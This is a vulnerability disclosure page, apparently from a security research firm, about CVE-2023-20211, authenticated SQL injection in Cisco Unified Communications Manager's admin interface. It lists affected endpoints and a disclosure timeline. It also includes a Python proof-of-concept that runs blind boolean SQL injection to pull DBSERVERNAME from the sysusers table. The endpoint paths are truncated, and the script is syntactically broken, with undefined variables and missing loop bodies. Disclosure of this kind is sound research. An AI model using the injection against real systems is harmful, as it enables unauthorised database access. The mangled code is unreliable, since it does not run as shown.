Research & Development
$ #


Multiple Authenticated SQL Injection Vulnerabilities

8.1 (High)


Cisco Unified Communications Manager

< 12.5(1)su8

Stanisław Koza and Jakub Sajniak

A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow any authenticated, remote attacker to conduct SQL injection attacks on an affected system.

There are multiple endpoints vulnerable to SQL injection identified in this CVE:

  • GET /ccmadmin/
  • GET /ccmadmin/
  • GET /ccmadmin/
  • POST /ccmadmin/
  • GET /ccmadmin/
  • POST /ccmadmin/

This Proof-of-concept uses injection found in the /ccmadmin/ endpoint.

To present the full impact of this vulnerability, a Proof of Concept exploit was created. The following exploit aims to exfiltrate DBSERVERNAME from table sysusers from database running on the backend.

In this proof-of-concept following payload is used:


Proof-of-concept code:

# POC for CISCO Unified CM Administration SQL Injection
# Injection point is:
# /ccmadmin/<injection>
# POC extracts DBSERVERNAME from sysusers
# PoC Created by Stanisław Koza from STM Cyber

import urllib3 
import requests 
from string import printable

# Configure variables below
baseurl = ""
cookies = {
    "JSESSIONID": "",
# Configure this ^^^

checkValue = "Validate String rule for Telepresence devices"

print("Extracting: ",end="")
for i in range(0,50):
    for c in charset:
        currentLength = len(extracted)+1
        passwordPrefix = extracted+c

        url = baseurl + f"/ccmadmin/*)%20FROM%20sysusers%20WHERE%201=1%20AND%20SUBSTRING(DBSERVERNAME%20FROM%201%20FOR%20{currentLength})='{passwordPrefix}')%20%3e%200)%20--&protocol=0"

        r = requests.get(url, cookies=cookies, verify=False)
        if checkValue not in r.text:
    if not foundExtension:
print(f"\n[+] Extracted from db: {extracted}")
  • 03-04-2023 - Vulnerability reported to Cisco PSIRT
  • 03-04-2023 - First response from Cisco
  • 20-04-2023 - Successful reproduction of the vulerability by Cisco
  • 16-08-2023 - CVE-2023-20211 is assigned to the vulnerability
  • 16-08-2023 - Security advisory is published by Cisco
  • 10-10-2023 - Publication of PoC